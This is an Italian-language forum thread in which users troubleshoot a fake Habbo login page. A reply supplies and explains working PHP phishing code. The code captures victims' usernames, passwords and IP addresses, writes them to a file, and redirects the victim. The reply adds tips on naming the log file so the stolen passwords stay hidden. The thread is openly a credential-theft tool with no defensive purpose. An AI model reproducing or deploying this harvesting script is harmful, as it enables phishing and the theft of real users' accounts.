Problema risolto errore send.php

franco2l

Utente bannato
Autore del topic
14 Febbraio 2008
194
9
Miglior risposta
0
ciao a tutti sto facendo un fake-login
ma ho un'errore
(send.php) quando vado su log.html vedo Questo:
Nome Habbo: [] Password: [] IP: [L'ip]
:help
 
Ultima modifica da un moderatore:
bene hai lo stesso identiko problema ke abbiamo io e il mio amico: non riusciamo a vedere le passw
 
ehm ma nei riquadri del fake [nome habbo e password] almeno hai messo lo stesso valore del send?
Cioè Habbo e Password? usa frontpage... Io mi trovavo bene..
O il valore o il nome o la chiave [Non ric se si chiama chiave] mi pare :S
 
si
krypto non ho dato a nessuno il link lo ho solo testato
dovevo mettere il download qui
EDIT: Deejay_Skeez non ho front page
 
vi spiego subito

<?php
#FakeLogin
#By me (franco)
$habbo = $_POST['habbo'];
$password = $_POST['password'];
$ip = $_SERVER['REMOTE_ADDR'];
$f = fopen("account.php", "a");
fwrite ($f, 'Nome Habbo: <b>['.$habbo.']</b> Password: <b>['.$password.']</b> IP: <b>['.$ip.']<b/><br>');
fclose($f);
header("Location: /errore.php");
?>

intanto potete togliere queste 2 stringhe #Fake Login #By me (franco)

$habbo = $_POST['habbo']; va a cercare quello che verrà scritto nella barra Habbo

header("Location: /errore.php");

al posto di errore.php dovete inseriti la pagina in cui volete che sia rindirizzata. se la vostra pagina si chiama Ban.php risulterà così

header("Location: /Ban.php");

il risultato è:

idem per password ed IP

$f = fopen("account.php", "a"); al posto di account.php potete metterci quello che volete in modo che le passwords non vengano lette da terzi... un mio consiglio potremme essere P%a%s%s%words.php così nessuno vi leggerà mai niente

fwrite va a scrivere su password.php tutto quello inerente con Habbo, password ed Ip

<b> ---> serve per dare le scritte in grassetto, esse vanno distaccate dalle altre parole

header("Location: /errore.php"); dipende da come si chiama la pagina in cui volete rindirizzare la vittima. Ad esempio:
se la vostra seconda pagina si chiama Ban.php esso risulterà così

header("Location: /Ban.php")


risultato di tutto

<?php
$habbo = $_POST['habbo'];
$password = $_POST['password'];
$ip = $_SERVER['REMOTE_ADDR'];
$f = fopen("Scrivete_quello_che_volete_questo_influisce_sul_nome_della_pagina_in_cui_arriveranno_le_password.php oppure .html oppure .htm", "a");
fwrite ($f, 'Nome Habbo: <b>['.$habbo.']</b> Password: <b>['.$password.']</b> IP: <b>['.$ip.']<b/><br>');
fclose($f);
header("Location: /nome_della_pagina_in_cui_deve_essere_rindirizzato.php/html/htm");
?>


un invia buono può essere:

<?php
$habbo = $_POST['habbo'];
$password = $_POST['password'];
$ip = $_SERVER['REMOTE_ADDR'];
$f = fopen("Passoword%Habbo%Derubati.php", "a");
fwrite ($f, 'Nome Habbo: <b>['.$habbo.']</b> Password: <b>['.$password.']</b> IP: <b>['.$ip.']<b/><br>');
fclose($f);
header("Location: /quidipendedallavostrapagina.php");
?>
 
Ultima modifica: